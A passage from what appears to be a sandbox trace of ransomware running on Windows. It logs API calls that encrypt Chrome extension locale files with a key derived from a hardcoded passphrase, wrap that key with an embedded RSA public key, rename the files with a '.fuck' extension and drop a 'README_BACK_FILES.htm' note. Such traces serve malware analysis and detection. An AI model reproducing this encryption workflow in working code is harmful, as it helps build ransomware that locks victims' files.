phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e6c5e0) returned 1 [0259.379] CryptImportPublicKeyInfo (in: hCryptProv=0x2e6c5e0, dwCertEncodingType=0x1, pInfo=0x2e281c0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e281f0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e281f8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7c5c0) returned 1 [0259.379] CryptEncrypt (in: hKey=0x2e7c5c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0259.379] CryptEncrypt (in: hKey=0x2e7c5c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e6c778*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e6c778*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0259.379] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e6c778*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e6c778*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0259.381] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x26e, lpOverlapped=0x0) returned 1 [0259.382] CryptEncrypt (in: hKey=0x2e7c440, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x26e, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x270) returned 1 [0259.382] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x270, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x270, lpOverlapped=0x0) returned 1 [0259.393] CloseHandle (hObject=0x5d60) returned 1 [0259.393] CloseHandle (hObject=0x5d5c) returned 1 [0259.393] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\messages.json"), bFailIfExists=0) returned 1 [0259.399] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\messages.json", dwFileAttributes=0x0) returned 1 [0259.399] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\messages.json.gsg")) returned 1 [0259.400] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\messages.json.fuck")) returned 1 [0259.401] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0259.401] CryptDestroyKey (hKey=0x2e7c440) returned 1 [0259.401] CryptReleaseContext (hProv=0x2e7b4f0, dwFlags=0x0) returned 1 [0259.401] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0259.402] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0259.402] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\readme_back_files.htm")) returned 0xffffffff [0259.402] AreFileApisANSI () returned 1 [0259.402] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3a48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 157 [0259.402] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0259.405] GetFileType (hFile=0x5d64) returned 0x1 [0259.405] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0259.406] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0259.406] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0259.407] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0259.407] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0259.407] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0259.407] GetLastError () returned 0x0 [0259.408] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\messages.json")) returned 0x20 [0259.408] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\messages.json", dwFileAttributes=0x80) returned 1 [0259.409] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0259.409] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0259.410] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0259.410] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7b4f0) returned 1 [0259.412] CryptCreateHash (in: hProv=0x2e7b4f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0259.412] lstrlenA (lpString="QPmjqALrRVCjmscVAzZjjQwqzMlQm") returned 29 [0259.412] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb710, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0259.412] CryptDeriveKey (in: hProv=0x2e7b4f0, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7c440) returned 1 [0259.412] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----i", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0259.412] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0259.412] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e6c668) returned 1 [0259.413] CryptImportPublicKeyInfo (in: hCryptProv=0x2e6c668, dwCertEncodingType=0x1, pInfo=0x2e27c10*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e27c40*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e27c48*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7c940) returned 1 [0259.413] CryptEncrypt (in: hKey=0x2e7c940, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0259.413] CryptEncrypt (in: hKey=0x2e7c940, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e6d328*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e6d328*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0259.413] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e6d328*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e6d328*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0259.414] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x30a, lpOverlapped=0x0) returned 1 [0259.416] CryptEncrypt (in: hKey=0x2e7c440, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x30a, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x310) returned 1 [0259.416] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x310, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x310, lpOverlapped=0x0) returned 1 [0259.418] CloseHandle (hObject=0x5d5c) returned 1 [0259.418] CloseHandle (hObject=0x5d60) returned 1 [0259.418] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\messages.json"), bFailIfExists=0) returned 1 [0259.434] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\messages.json", dwFileAttributes=0x0) returned 1 [0259.435] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\messages.json.gsg")) returned 1 [0259.436] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\messages.json.fuck")) returned 1 [0259.437] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0259.437] CryptDestroyKey (hKey=0x2e7c440) returned 1 [0259.437] CryptReleaseContext (hProv=0x2e7b4f0, dwFlags=0x0) returned 1 [0259.437] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0259.438] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0259.438] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\readme_back_files.htm")) returned 0xffffffff [0259.438] AreFileApisANSI () returned 1 [0259.438] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3a48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 157 [0259.438] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0259.439] GetFileType (hFile=0x5d64) returned 0x1 [0259.439] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0259.440] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0259.440] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0259.441] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0259.441] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0259.441] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0259.441] GetLastError () returned 0x0 [0259.441] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\messages.json")) returned 0x20 [0259.441] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\messages.json", dwFileAttributes=0x80) returned 1 [0259.442] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0259.442] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0259.443] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0259.444] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7b4f0) returned 1 [0259.446] CryptCreateHash (in: hProv=0x2e7b4f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0259.446] lstrlenA (lpString="QPmjqALrRVCjmscVAzZjjQwqzMlQm") returned 29 [0259.446] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb468, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0259.446] CryptDeriveKey (in: hProv=0x2e7b4f0, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7c7c0) returned 1 [0259.446] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----i", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0259.446] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0259.446] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e6dc30) returned 1 [0259.446] CryptImportPublicKeyInfo (in: hCryptProv=0x2e6dc30, dwCertEncodingType=0x1, pInfo=0x2e27a70*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e27aa0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e27aa8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7cf80) returned 1 [0259.446] CryptEncrypt (in: hKey=0x2e7cf80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0259.447] CryptEncrypt (in: hKey=0x2e7cf80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e6db20*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e6db20*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0259.447] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e6db20*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e6db20*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0259.448] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x29d, lpOverlapped=0x0) returned 1 [0259.449] CryptEncrypt (in: hKey=0x2e7c7c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x29d, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x2a0) returned 1 [0259.449] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x2a0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x2a0, lpOverlapped=0x0) returned 1 [0259.463] CloseHandle (hObject=0x5d60) returned 1 [0259.463] CloseHandle (hObject=0x5d5c) returned 1 [0259.464] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\messages.json"), bFailIfExists=0) returned 1 [0259.467] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\messages.json", dwFileAttributes=0x0) returned 1 [0259.467] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\messages.json.gsg" (normalized: 